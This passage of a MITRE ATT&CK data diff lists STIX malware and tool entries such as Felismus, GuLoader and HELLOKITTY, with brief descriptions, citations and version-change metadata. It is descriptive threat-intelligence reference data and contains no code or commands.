Retrieved September 23, 2020.", + "url": "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Operation_Ghost_Dukes.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "FatDuke" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:21.871000+00:00\", \"old_value\": \"2025-04-16 20:38:08.387000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--196f1f32-e0c2-4d46-99cd-234d4b6befe1", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-01-16 16:13:52.465000+00:00", + "modified": "2025-04-25 14:42:46.344000+00:00", + "name": "Felismus", + "description": "[Felismus](https://attack.mitre.org/software/S0171) is a modular backdoor that has been used by [Sowbug](https://attack.mitre.org/groups/G0054). (Citation: Symantec Sowbug Nov 2017) (Citation: Forcepoint Felismus Mar 2017)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0171", + "external_id": "S0171" + }, + { + "source_name": "Felismus", + "description": "(Citation: Symantec Sowbug Nov 2017) (Citation: Forcepoint Felismus Mar 2017)" + }, + { + "source_name": "Symantec Sowbug Nov 2017", + "description": "Symantec Security Response. (2017, November 7). Sowbug: Cyber espionage group targets South American and Southeast Asian governments. 
Retrieved November 16, 2017.", + "url": "https://www.symantec.com/connect/blogs/sowbug-cyber-espionage-group-targets-south-american-and-southeast-asian-governments" + }, + { + "source_name": "Forcepoint Felismus Mar 2017", + "description": "Somerville, L. and Toro, A. (2017, March 30). Playing Cat & Mouse: Introducing the Felismus Malware. Retrieved November 16, 2017.", + "url": "https://blogs.forcepoint.com/security-labs/playing-cat-mouse-introducing-felismus-malware" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Felismus" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:42:46.344000+00:00\", \"old_value\": \"2025-04-16 20:37:57.048000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--73d08401-005f-4e1f-90b9-8f45d120879f", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2022-02-01 19:19:26.408000+00:00", + "modified": "2025-04-25 14:43:45.868000+00:00", + "name": "Ferocious", + "description": "[Ferocious](https://attack.mitre.org/software/S0679) is a first stage implant composed of VBS and PowerShell scripts that has been used by [WIRTE](https://attack.mitre.org/groups/G0090) since at least 2021.(Citation: Kaspersky WIRTE November 2021)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0679", + "external_id": "S0679" + }, + { + "source_name": "Kaspersky WIRTE November 2021", + "description": "Yamout, M. 
(2021, November 29). WIRTE\u2019s campaign in the Middle East \u2018living off the land\u2019 since at least 2019. Retrieved February 1, 2022.", + "url": "https://securelist.com/wirtes-campaign-in-the-middle-east-living-off-the-land-since-at-least-2019/105044" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Ferocious" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:45.868000+00:00\", \"old_value\": \"2025-04-16 20:38:17.322000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "tool", + "id": "tool--4f45dfeb-fe51-4df0-8db3-edf7dd0513fe", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:33:10.569000+00:00", + "modified": "2025-04-25 14:45:18.484000+00:00", + "name": "Fgdump", + "description": "[Fgdump](https://attack.mitre.org/software/S0120) is a Windows password hash dumper. (Citation: Mandiant APT1)", + "revoked": false, + "labels": [ + "tool" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0120", + "external_id": "S0120" + }, + { + "source_name": "Mandiant APT1", + "description": "Mandiant. (n.d.). APT1 Exposing One of China\u2019s Cyber Espionage Units. 
Retrieved July 18, 2016.", + "url": "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Fgdump" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:45:18.484000+00:00\", \"old_value\": \"2025-04-16 20:38:51.728000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--a2282af0-f9dd-4373-9b92-eaf9e11e0c71", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2019-01-31 00:23:06.022000+00:00", + "modified": "2025-04-25 14:44:16.040000+00:00", + "name": "Final1stspy", + "description": "[Final1stspy](https://attack.mitre.org/software/S0355) is a dropper family that has been used to deliver [DOGCALL](https://attack.mitre.org/software/S0213).(Citation: Unit 42 Nokki Oct 2018)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0355", + "external_id": "S0355" + }, + { + "source_name": "Final1stspy", + "description": "(Citation: Unit 42 Nokki Oct 2018)" + }, + { + "source_name": "Unit 42 Nokki Oct 2018", + "description": "Grunzweig, J. (2018, October 01). NOKKI Almost Ties the Knot with DOGCALL: Reaper Group Uses New Malware to Deploy RAT. 
Retrieved November 5, 2018.", + "url": "https://researchcenter.paloaltonetworks.com/2018/10/unit42-nokki-almost-ties-the-knot-with-dogcall-reaper-group-uses-new-malware-to-deploy-rat/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Final1stspy" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:16.040000+00:00\", \"old_value\": \"2025-04-16 20:38:28.188000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--592260fb-dd5c-4a30-8d99-106a0485be0d", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2022-03-25 14:58:24.832000+00:00", + "modified": "2025-04-25 19:04:04.232000+00:00", + "name": "Flagpro", + "description": "[Flagpro](https://attack.mitre.org/software/S0696) is a Windows-based, first-stage downloader that has been used by [BlackTech](https://attack.mitre.org/groups/G0098) since at least October 2020. It has primarily been used against defense, media, and communications companies in Japan.(Citation: NTT Security Flagpro new December 2021) ", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0696", + "external_id": "S0696" + }, + { + "source_name": "NTT Security Flagpro new December 2021", + "description": "Hada, H. (2021, December 28). Flagpro The new malware used by BlackTech. 
Retrieved March 25, 2022.", + "url": "https://insight-jp.nttsecurity.com/post/102hf3q/flagpro-the-new-malware-used-by-blacktech" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Flagpro" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Hannah S" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 19:04:04.232000+00:00\", \"old_value\": \"2024-09-04 21:39:21.144000+00:00\"}, \"root['x_mitre_contributors'][0]\": {\"new_value\": \"Hannah S\", \"old_value\": \"Hannah Simes, BT Security\"}}}", + "previous_version": "1.0" + }, + { + "type": "tool", + "id": "tool--90ec2b22-7061-4469-b539-0989ec4f96c2", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-04-18 17:59:24.739000+00:00", + "modified": "2025-04-25 14:45:23.318000+00:00", + "name": "Forfiles", + "description": "[Forfiles](https://attack.mitre.org/software/S0193) is a Windows utility commonly used in batch jobs to execute commands on one or more selected files or directories (ex: list all directories in a drive, read the first line of all files created yesterday, etc.). Forfiles can be executed from either the command line, Run window, or batch files/scripts. (Citation: Microsoft Forfiles Aug 2016)", + "revoked": false, + "labels": [ + "tool" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0193", + "external_id": "S0193" + }, + { + "source_name": "Microsoft Forfiles Aug 2016", + "description": "Microsoft. (2016, August 31). Forfiles. 
Retrieved January 22, 2018.", + "url": "https://docs.microsoft.com/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/cc753551(v=ws.11)" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:45:23.318000+00:00\", \"old_value\": \"2025-04-16 20:38:54.018000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--1cdbbcab-903a-414d-8eb0-439a97343737", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-08 14:55:46.094000+00:00", + "modified": "2025-04-25 14:42:47.607000+00:00", + "name": "FrameworkPOS", + "description": "[FrameworkPOS](https://attack.mitre.org/software/S0503) is a point of sale (POS) malware used by [FIN6](https://attack.mitre.org/groups/G0037) to steal payment card data from sytems that run physical POS devices.(Citation: SentinelOne FrameworkPOS September 2019)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0503", + "external_id": "S0503" + }, + { + "source_name": "Trinity", + "description": "(Citation: SentinelOne FrameworkPOS September 2019)" + }, + { + "source_name": "SentinelOne FrameworkPOS September 2019", + "description": "Kremez, V. (2019, September 19). FIN6 \u201cFrameworkPOS\u201d: Point-of-Sale Malware Analysis & Internals. 
Retrieved September 8, 2020.", + "url": "https://labs.sentinelone.com/fin6-frameworkpos-point-of-sale-malware-analysis-internals-2/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "FrameworkPOS", + "Trinity" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:42:47.607000+00:00\", \"old_value\": \"2025-04-16 20:37:57.360000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--04fc1842-f9e4-47cf-8cb8-5c61becad142", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2019-10-11 17:29:20.165000+00:00", + "modified": "2025-04-25 14:42:33.402000+00:00", + "name": "GRIFFON", + "description": "[GRIFFON](https://attack.mitre.org/software/S0417) is a JavaScript backdoor used by [FIN7](https://attack.mitre.org/groups/G0046). (Citation: SecureList Griffon May 2019)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0417", + "external_id": "S0417" + }, + { + "source_name": "SecureList Griffon May 2019", + "description": "Namestnikov, Y. and Aime, F. (2019, May 8). FIN7.5: the infamous cybercrime rig \u201cFIN7\u201d continues its activities. 
Retrieved October 11, 2019.", + "url": "https://securelist.com/fin7-5-the-infamous-cybercrime-rig-fin7-continues-its-activities/90703/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "GRIFFON" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:42:33.402000+00:00\", \"old_value\": \"2025-04-16 20:37:52.695000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--199463de-d9be-46d6-bb41-07234c1dd5a6", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:32:36.177000+00:00", + "modified": "2025-04-25 14:42:46.881000+00:00", + "name": "GeminiDuke", + "description": "[GeminiDuke](https://attack.mitre.org/software/S0049) is malware that was used by [APT29](https://attack.mitre.org/groups/G0016) from 2009 to 2012. (Citation: F-Secure The Dukes)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0049", + "external_id": "S0049" + }, + { + "source_name": "F-Secure The Dukes", + "description": "F-Secure Labs. (2015, September 17). The Dukes: 7 years of Russian cyberespionage. 
Retrieved December 10, 2015.", + "url": "https://www.f-secure.com/documents/996508/1030745/dukes_whitepaper.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "GeminiDuke" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:42:46.881000+00:00\", \"old_value\": \"2025-04-16 20:37:57.198000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--099ecff2-41b8-436d-843c-038a9aa9aa69", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-05-29 20:32:42.686000+00:00", + "modified": "2025-04-25 14:42:37.942000+00:00", + "name": "Get2", + "description": "[Get2](https://attack.mitre.org/software/S0460) is a downloader written in C++ that has been used by [TA505](https://attack.mitre.org/groups/G0092) to deliver [FlawedGrace](https://attack.mitre.org/software/S0383), [FlawedAmmyy](https://attack.mitre.org/software/S0381), Snatch and [SDBbot](https://attack.mitre.org/software/S0461).(Citation: Proofpoint TA505 October 2019)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0460", + "external_id": "S0460" + }, + { + "source_name": "Proofpoint TA505 October 2019", + "description": "Schwarz, D. et al. (2019, October 16). TA505 Distributes New SDBbot Remote Access Trojan with Get2 Downloader. 
Retrieved May 29, 2020.", + "url": "https://www.proofpoint.com/us/threat-insight/post/ta505-distributes-new-sdbbot-remote-access-trojan-get2-downloader" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Get2" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:42:37.942000+00:00\", \"old_value\": \"2025-04-16 20:37:54.423000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--45c759ac-b490-48bb-80d4-c8eee3431027", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-01-11 20:49:20.832000+00:00", + "modified": "2025-04-25 14:43:09.227000+00:00", + "name": "GuLoader", + "description": "[GuLoader](https://attack.mitre.org/software/S0561) is a file downloader that has been used since at least December 2019 to distribute a variety of remote administration tool (RAT) malware, including [NETWIRE](https://attack.mitre.org/software/S0198), [Agent Tesla](https://attack.mitre.org/software/S0331), [NanoCore](https://attack.mitre.org/software/S0336), FormBook, and Parallax RAT.(Citation: Unit 42 NETWIRE April 2020)(Citation: Medium Eli Salem GuLoader April 2021)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0561", + "external_id": "S0561" + }, + { + "source_name": "Unit 42 NETWIRE April 2020", + "description": "Duncan, B. (2020, April 3). GuLoader: Malspam Campaign Installing NetWire RAT. 
Retrieved January 7, 2021.", + "url": "https://unit42.paloaltonetworks.com/guloader-installing-netwire-rat/" + }, + { + "source_name": "Medium Eli Salem GuLoader April 2021", + "description": "Salem, E. (2021, April 19). Dancing With Shellcodes: Cracking the latest version of Guloader. Retrieved July 7, 2021.", + "url": "https://elis531989.medium.com/dancing-with-shellcodes-cracking-the-latest-version-of-guloader-75083fb15cb4" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "GuLoader" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Eli Salem, @elisalem9" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "2.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:09.227000+00:00\", \"old_value\": \"2025-04-16 20:38:04.665000+00:00\"}}}", + "previous_version": "2.0" + }, + { + "type": "malware", + "id": "malware--f8dfbc54-b070-4224-b560-79aaa5f835bd", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:33:15.910000+00:00", + "modified": "2025-04-25 14:45:07.358000+00:00", + "name": "H1N1", + "description": "[H1N1](https://attack.mitre.org/software/S0132) is a malware variant that has been distributed via a campaign using VBA macros to infect victims. Although it initially had only loader capabilities, it has evolved to include information-stealing functionality. 
(Citation: Cisco H1N1 Part 1)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0132", + "external_id": "S0132" + }, + { + "source_name": "Cisco H1N1 Part 1", + "description": "Reynolds, J.. (2016, September 13). H1N1: Technical analysis reveals new capabilities. Retrieved September 26, 2016.", + "url": "http://blogs.cisco.com/security/h1n1-technical-analysis-reveals-new-capabilities" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "H1N1" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.2", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:45:07.358000+00:00\", \"old_value\": \"2025-04-16 20:38:44.456000+00:00\"}}}", + "previous_version": "1.2" + }, + { + "type": "malware", + "id": "malware--0ced8926-914e-4c78-bc93-356fb90dbd1f", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-12-14 16:46:06.044000+00:00", + "modified": "2025-04-25 14:42:41.277000+00:00", + "name": "HALFBAKED", + "description": "[HALFBAKED](https://attack.mitre.org/software/S0151) is a malware family consisting of multiple components intended to establish persistence in victim networks. (Citation: FireEye FIN7 April 2017)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0151", + "external_id": "S0151" + }, + { + "source_name": "FireEye FIN7 April 2017", + "description": "Carr, N., et al. (2017, April 24). 
FIN7 Evolution and the Phishing LNK. Retrieved April 24, 2017.", + "url": "https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:42:41.277000+00:00\", \"old_value\": \"2025-04-16 20:37:55.633000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--bd0536d7-b081-43ae-a773-cfb057c5b988", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-10-17 00:14:20.652000+00:00", + "modified": "2025-04-25 14:44:34.161000+00:00", + "name": "HARDRAIN", + "description": "[HARDRAIN](https://attack.mitre.org/software/S0246) is a Trojan malware variant reportedly used by the North Korean government. (Citation: US-CERT HARDRAIN March 2018)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0246", + "external_id": "S0246" + }, + { + "source_name": "HARDRAIN", + "description": "(Citation: US-CERT HARDRAIN March 2018)" + }, + { + "source_name": "US-CERT HARDRAIN March 2018", + "description": "US-CERT. (2018, February 05). Malware Analysis Report (MAR) - 10135536-F. 
Retrieved June 11, 2018.", + "url": "https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-F.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "HARDRAIN" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:34.161000+00:00\", \"old_value\": \"2025-04-16 20:38:33.134000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--5d11d418-95dd-4377-b782-23160dfa17b4", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-06-03 20:07:21.788000+00:00", + "modified": "2025-04-25 14:43:30.306000+00:00", + "name": "HELLOKITTY", + "description": "[HELLOKITTY](https://attack.mitre.org/software/S0617) is a ransomware written in C++ that shares similar code structure and functionality with [DEATHRANSOM](https://attack.mitre.org/software/S0616) and [FIVEHANDS](https://attack.mitre.org/software/S0618). [HELLOKITTY](https://attack.mitre.org/software/S0617) has been used since at least 2020, targets have included a Polish video game developer and a Brazilian electric power company.(Citation: FireEye FiveHands April 2021)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0617", + "external_id": "S0617" + }, + { + "source_name": "FireEye FiveHands April 2021", + "description": "McLellan, T. and Moore, J. et al. (2021, April 29). UNC2447 SOMBRAT and FIVEHANDS Ransomware: A Sophisticated Financial Threat. 
Retrieved June 2, 2021.", + "url": "https://www.fireeye.com/blog/threat-research/2021/04/unc2447-sombrat-and-fivehands-ransomware-sophisticated-financial-threat.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "HELLOKITTY" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:30.306000+00:00\", \"old_value\": \"2025-04-16 20:38:11.555000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--e066bf86-9cfb-407a-9d25-26fd5d91e360", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:32:46.445000+00:00", + "modified": "2025-04-25 14:44:53.772000+00:00", + "name": "HTTPBrowser", + "description": "[HTTPBrowser](https://attack.mitre.org/software/S0070) is malware that has been used by several threat groups. (Citation: ThreatStream Evasion Analysis) (Citation: Dell TG-3390) It is believed to be of Chinese origin. (Citation: ThreatConnect Anthem)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0070", + "external_id": "S0070" + }, + { + "source_name": "HttpDump", + "description": "(Citation: ThreatConnect Anthem)" + }, + { + "source_name": "ThreatStream Evasion Analysis", + "description": "Shelmire, A.. (2015, July 6). Evasive Maneuvers. 
Retrieved January 22, 2016.", + "url": "https://www.threatstream.com/blog/evasive-maneuvers-the-wekby-group-attempts-to-evade-analysis-via-custom-rop" + }, + { + "source_name": "Dell TG-3390", + "description": "Dell SecureWorks Counter Threat Unit Threat Intelligence. (2015, August 5). Threat Group-3390 Targets Organizations for Cyberespionage. Retrieved August 18, 2018.", + "url": "https://www.secureworks.com/research/threat-group-3390-targets-organizations-for-cyberespionage" + }, + { + "source_name": "ThreatConnect Anthem", + "description": "ThreatConnect Research Team. (2015, February 27). The Anthem Hack: All Roads Lead to China. Retrieved January 26, 2016.", + "url": "https://www.threatconnect.com/the-anthem-hack-all-roads-lead-to-china/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "HTTPBrowser", + "Token Control", + "HttpDump" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": 